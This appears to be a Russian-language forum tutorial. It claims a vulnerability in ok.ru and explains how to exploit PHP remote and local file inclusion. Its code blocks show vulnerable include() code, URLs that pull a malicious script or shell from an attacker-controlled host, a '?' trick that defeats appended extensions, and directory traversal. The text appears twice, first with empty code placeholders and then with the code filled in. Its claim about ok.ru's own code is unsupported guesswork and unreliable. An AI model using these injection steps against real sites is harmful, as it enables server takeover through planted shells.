Недавно найдена уязвимость в ок.ру, и я расскажу вам, как использовать эту уязвимость.
Для начала нам требуется вывести эту уязвимость. Выбираем любое фото или надпись на стенке и пишем любой комментарий, нажимаем кнопку обновить и ищем в ссылке page=1
1 - это отображаемая страница.
Теперь мы видим, что ок использует комманду page=1 для отображения запрашиваемой страницы.
Код будет выглядить так:
PHP:
Это значит, что все, выводимое на странице, будет внедрено в php-код этой страницы. Следовательно атакующий может проделать что-то наподобии:
PHP:
Если посмотреть, что происходит после выполнения инклуда, нам представится следующий код, выполненный на целевом сервере:
PHP:
Мы видим, что злоумышленник произвел успешную атаку на целевой сервер.
Подробнее:
И так, почему же злоумышленник смог провести PHP-инъекцию?
Все потому что функция include()позволяет запускать удаленные файлы.
Почему в примере был указан скрипт с расширением *.txt, а не *.php?
Ответ прост, если бы скрипт имел формат *.php, он бы запустился на сервере злоумышленника, а не на целевой системе.
Так же был добавлен символ "?" в пути к внедряемому скрипту, чтобы убрать что-либо, находящееся внутри функцииinclude() на целевом сервере.
Пример:
PHP:
Этот скрипт добавляет расширение *.phpк чему либо, вызываемомому коммандойinclude().
Т.е.
PHP:
Превращается в
PHP:
С таким именем скрипт не запустится (на сервере злоумышленника не существует фала /вредоносный_скрипт.txt.php)
По этому, мы и добавляем "?" в конец пути к вредоносному скрипту:
PHP:
Но он остается исполняемым.
RFI - удаленный инклюд при PHP-инъекции.
Возможность проведения RFI - довольно частая бага в двигах.
Найти ее можно следущим образом:
Допустим мы случайно набрели на страницу, в адресной строке броузера заканчивающуюся подобным образом:
PHP:
Подставляем вместо main любое бредовое значение, например upyachka
PHP:
В ответ получим ошибку:
PHP:
Это показывает нам на то, что инклуд осуществим.
Пробуем подставить вместо upyachkaсайт с путем до шелла (расширения файла шелла не должно указываться, или указывать его, как было описано выше)
PHP:
Таким образом получен шелл. Теперь нужно сообщить админу сайта об уязвимости, что бы он исправил, и злые дядьки не воспользовались багой.
LFI - локальный инклюд при PHP-инъекции.
Представим, что мы набрели на тот же уязвимый сайт
PHP:
С кодом
PHP:
Это уже локальный инклюд. В этой ситуации возможен только листинг файлов:
PHP:
В следующем случае код выглядит вот таким образом:
PHP:
В этом случае можно прописать путь к шеллу следующим образом:
Создаем папку folder на сайте, где хранится шелл, в эту папку закидываем шелл:
PHP:
Инъекция в таком случае будет выглядить так:
PHP:
Если вы не знаете как написать вредоностный скрипт, то Гугл в помощь
Для начала нам требуется вывести эту уязвимость. Выбираем любое фото или надпись на стенке и пишем любой комментарий, нажимаем кнопку обновить и ищем в ссылке page=1
1 - это отображаемая страница.
Теперь мы видим, что ок использует комманду page=1 для отображения запрашиваемой страницы.
Код будет выглядить так:
PHP:
Код:
<?php
$file =$_GET['page']; //Отображаемая страница
include($file);
?>
PHP:
Код:
http://www.ok.ru/index.php?page=http://www.атакующий_серв.com/вредоносный_скрипт.txt?
PHP:
Код:
<?php
$file ="http://www.атакующий_серв.com/вредоносный_скрипт.txt?"; //$_GET['page'];
include($file); //$file - это внедренный злоумышленником скрипт
?>
Подробнее:
И так, почему же злоумышленник смог провести PHP-инъекцию?
Все потому что функция include()позволяет запускать удаленные файлы.
Почему в примере был указан скрипт с расширением *.txt, а не *.php?
Ответ прост, если бы скрипт имел формат *.php, он бы запустился на сервере злоумышленника, а не на целевой системе.
Так же был добавлен символ "?" в пути к внедряемому скрипту, чтобы убрать что-либо, находящееся внутри функцииinclude() на целевом сервере.
Пример:
PHP:
Код:
<?php
$file =$_GET['page'];
include($file .".php");
?>
Т.е.
PHP:
Код:
http://www.атакующий_серв.com/вредоносный_скрипт.txt
PHP:
Код:
http://www.атакующий_серв.com/вредоносный_скрипт.txt.php
По этому, мы и добавляем "?" в конец пути к вредоносному скрипту:
PHP:
Код:
http://www.атакующий_серв.com/вредоносный_скрипт.txt?.php
RFI - удаленный инклюд при PHP-инъекции.
Возможность проведения RFI - довольно частая бага в двигах.
Найти ее можно следущим образом:
Допустим мы случайно набрели на страницу, в адресной строке броузера заканчивающуюся подобным образом:
PHP:
Код:
/index.php?page=main
PHP:
Код:
/index.php?page=upyachka
PHP:
Код:
Warning: main(upyachka.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3
Warning: main(upyachka.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3
Warning: main(): Failed opening 'upyachka.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
Пробуем подставить вместо upyachkaсайт с путем до шелла (расширения файла шелла не должно указываться, или указывать его, как было описано выше)
PHP:
Код:
http://www.атакуемый_сервер.com/index.php?file=http://www.сайт_злоумышленника.com/shell
LFI - локальный инклюд при PHP-инъекции.
Представим, что мы набрели на тот же уязвимый сайт
PHP:
Код:
/index.php?file=main
PHP:
Код:
<?
..
Include ("folder/$page.htm");
…
?>
PHP:
Код:
/index.php?page=../index.php
PHP:
Код:
<?
..
Include ("$dir1/folder/page.php");
…
?>
Создаем папку folder на сайте, где хранится шелл, в эту папку закидываем шелл:
PHP:
Код:
http://www.сайт_злоумышленника.com/folder/shell.php
PHP:
Код:
index.php?dir1=http://www.сайт_злоумышленника.com/